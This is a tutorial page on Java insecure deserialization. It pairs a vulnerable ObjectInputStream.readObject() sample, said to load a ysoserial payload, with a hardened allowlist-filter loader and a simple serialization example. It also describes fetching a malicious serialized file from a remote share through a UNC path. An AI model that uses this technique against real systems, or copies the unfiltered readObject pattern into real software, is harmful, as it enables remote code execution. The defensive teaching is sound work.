ObjectInputStream

One of the most common insecure deserialization flaws is unsafe use of ObjectInputStream: readObject() instantiates whatever classes the stream names before any cast or check in the calling code runs. Below you can find a sample of vulnerable code:

import java.io.FileInputStream;
import java.io.ObjectInputStream;

String fileName = "file.bin"; // suppose it is user controlled
// file.bin -> binary file containing an object created with ysoserial

FileInputStream fis = new FileInputStream(fileName);
ObjectInputStream ois = new ObjectInputStream(fis);
// Even though the line below casts to HashMap, the object is fully created before the cast runs
java.util.HashMap today = (java.util.HashMap) ois.readObject(); // <- Insecure

How to reach a malicious file when we have access to an unsanitized FileInputStream? It's simple!

String fileName = "\\\\192.168.0.1\\share\\file.bin"; // <- UNC path to a file on the share (backslashes escaped for a Java literal)

FileInputStream fis = new FileInputStream(fileName); // unsanitized FileInputStream can reach the shares
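The two weaknesses above (a stream-chosen class being instantiated, and a caller-chosen path being opened) each have a direct fix. The following is an added example, not code from the page: it constrains the file name to a single entry directly under an assumed data directory, and it installs a JEP 290 ObjectInputFilter (Java 9+) that allows only the classes a HashMap<String,Integer> needs and rejects everything else before it is instantiated. The directory name, the sample files and the map contents are constructed for the example.

```java
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Map;

public class SafeMapLoader {

    // Assumption: serialized maps live only in this directory (constructed for the example).
    private static final Path BASE_DIR = Paths.get("data").toAbsolutePath().normalize();

    // JEP 290 filter: exactly the classes a HashMap<String,Integer> stream contains, everything
    // else rejected ("!*"), plus limits on nesting depth, reference count and stream size.
    private static final ObjectInputFilter MAP_FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=8;maxrefs=1000;maxbytes=65536;"
            + "java.util.HashMap;java.lang.String;java.lang.Integer;java.lang.Number;!*");

    /** Maps an untrusted name onto a file directly inside BASE_DIR, or throws. */
    static Path resolveUnderBase(String untrustedName) {
        // A plain file name never contains a separator on either platform; refusing both here
        // also stops UNC names (\\host\share\...) on Linux, where '\' is an ordinary character.
        if (untrustedName.isEmpty() || untrustedName.contains("/") || untrustedName.contains("\\")) {
            throw new IllegalArgumentException("file name must not contain path separators: " + untrustedName);
        }
        Path target;
        try {
            target = BASE_DIR.resolve(untrustedName).normalize();
        } catch (InvalidPathException e) {
            throw new IllegalArgumentException("invalid file name", e);
        }
        // Defence in depth: ".." and absolute inputs leave BASE_DIR after normalize(), or are
        // not a direct child of it; both are refused.
        if (!target.startsWith(BASE_DIR) || !BASE_DIR.equals(target.getParent())) {
            throw new IllegalArgumentException("file name escapes the data directory: " + untrustedName);
        }
        return target;
    }

    /** Hardened counterpart of the readObject() call shown on the page. */
    @SuppressWarnings("unchecked")
    static Map<String, Integer> loadMap(String untrustedName) throws IOException, ClassNotFoundException {
        Path file = resolveUnderBase(untrustedName);
        try (FileInputStream fis = new FileInputStream(file.toFile());
             ObjectInputStream ois = new ObjectInputStream(fis)) {
            // Must be set before readObject(): the filter is consulted for every class descriptor
            // in the stream, so an unexpected class is refused before it is instantiated.
            ois.setObjectInputFilter(MAP_FILTER);
            return (HashMap<String, Integer>) ois.readObject();
        }
    }

    private static void write(Path file, Object o) throws IOException {
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file.toFile()))) {
            oos.writeObject(o);
        }
    }

    public static void main(String[] args) throws Exception {
        Files.createDirectories(BASE_DIR);

        // Constructed sample inputs: the expected map, and a stream of a class the loader never asked for.
        Map<String, Integer> expected = new HashMap<>();
        expected.put("alice", 30);
        write(BASE_DIR.resolve("good.bin"), expected);
        write(BASE_DIR.resolve("other.bin"), new ArrayList<>(expected.keySet()));

        System.out.println("good.bin  -> " + loadMap("good.bin"));

        try {
            loadMap("other.bin");
        } catch (InvalidClassException e) {
            System.out.println("other.bin -> rejected by filter: " + e.getMessage());
        }

        for (String name : new String[] {"../etc/passwd", "\\\\192.168.0.1\\share\\file.bin"}) {
            try {
                loadMap(name);
            } catch (IllegalArgumentException e) {
                System.out.println(name + " -> " + e.getMessage());
            }
        }
    }
}
```

The filter pattern is an allowlist, which is the only form that holds up: a denylist of known gadget classes has to be updated every time a new chain is published, whereas "!*" after the expected classes rejects anything the application did not explicitly expect. The same filter can be applied process-wide with the jdk.serialFilter system property, which is the right place for it when you cannot touch every readObject() call site.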

Serializing a Manually Created Class

import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

// Minimal Serializable class to write out; the page does not show it, so it is assumed here
class Person implements Serializable {
    private static final long serialVersionUID = 1L;
    private final String name;
    private final int age;
    Person(String name, int age) { this.name = name; this.age = age; }
}

public class SerializePerson {
    public static void main(String[] args) throws Exception {
        Person p = new Person("Alice", 30); // change this to your object
        try (FileOutputStream fos = new FileOutputStream("person.bin");
             ObjectOutputStream oos = new ObjectOutputStream(fos)) {
            oos.writeObject(p);
            System.out.println("Wrote person.bin");
        }
    }
}